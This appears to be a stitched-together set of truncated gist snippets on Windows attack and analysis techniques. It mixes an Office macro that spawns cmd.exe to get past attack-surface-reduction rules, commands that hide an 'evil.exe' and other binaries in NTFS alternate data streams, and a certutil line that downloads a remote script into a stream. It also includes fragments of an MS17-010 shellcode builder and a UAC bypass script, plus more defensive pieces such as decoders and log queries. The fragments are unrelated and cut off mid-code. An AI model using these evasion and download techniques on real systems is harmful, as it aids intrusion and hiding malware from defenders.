| ' ASR rules bypass creating child processes | |
| ' https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction | |
| ' https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office | |
| ' https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule | |
| Sub ASR_blocked() | |
| Dim WSHShell As Object | |
| Set WSHShell = CreateObject("Wscript.Shell") | |
| WSHShell.Run "cmd.exe" | |
| End Sub |
| Set-ExecutionPolicy Unrestricted; | |
| iex ((New-Object System.Net.WebClient).DownloadString('http://boxstarter.org/bootstrapper.ps1')); | |
| get-boxstarter -Force; | |
| Install-BoxstarterPackage -PackageName 'https://gist.githubusercontent.com/OALabs/afb619ce8778302c324373378abbaef5/raw/4006323180791f464ec0a8a838c7b681f42d238c/oalabs_x86vm.ps1'; |
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
| Invoke-WebRequest: | |
| Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.14393.1066 | |
| System.Net.WebClient.DownloadFile(): | |
| None | |
| Start-BitsTransfer: | |
| Microsoft BITS/7.8 | |
| certutil.exe: |
| # This file has no update anymore. Please see https://github.com/worawit/MS17-010 | |
| import sys | |
| from struct import pack | |
| if len(sys.argv) < 4: | |
| print('Usage: {} sc_x86 sc_x64 sc_out'.format(sys.argv[0])) | |
| sys.exit() | |
| sc_x86 = open(sys.argv[1], 'rb').read() | |
| sc_x64 = open(sys.argv[2], 'rb').read() |
| # Powershell script to bypass UAC on Vista+ assuming | |
| # there exists one elevated process on the same desktop. | |
| # Technical details in: | |
| # https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-1.html | |
| # https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-2.html | |
| # https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-3.html | |
| # You need to Install-Module NtObjectManager for this to run. | |
| Import-Module NtObjectManager |
| # Usage: findelevate.py C:\Windows\System32\ | |
| # Needs sigcheck.exe in path [https://technet.microsoft.com/en-us/sysinternals/bb897441.aspx] | |
| import sys | |
| import os | |
| import glob | |
| import subprocess | |
| if len(sys.argv) < 2: | |
| print "Usage: findelevate.py <PATH>" |
| # | |
| # Decode a base64 and compressed Powershell script. | |
| # | |
| # | |
| # | |
| # | |
| $input = Read-Host -Prompt 'Base64 Text' | |
| $decoded = $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream($(New-Object IO.MemoryStream(,$([Convert]::FromBase64String($input)))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd(); | |
| Write-Host "----- Decoded -----" |
| #!/usr/bin/python2.7 | |
| import argparse | |
| def decode(data, key, offset, extra_rounds): | |
| maxlen = len(data) | |
| keylen = len(key) | |
| j = 0 #key index | |
| num2 = (maxlen - 1) * (extra_rounds + 1) | |
| decoded = bytearray() |
| # Logparser | |
| ############### | |
| # Security Log | |
| ############### | |
| # Find Event id | |
| & 'C:\Program Files (x86)\Log Parser 2.2\LogParser.exe' -stats:OFF -i:EVT "SELECT * FROM 'Security.evtx' WHERE EventID = '5038'" |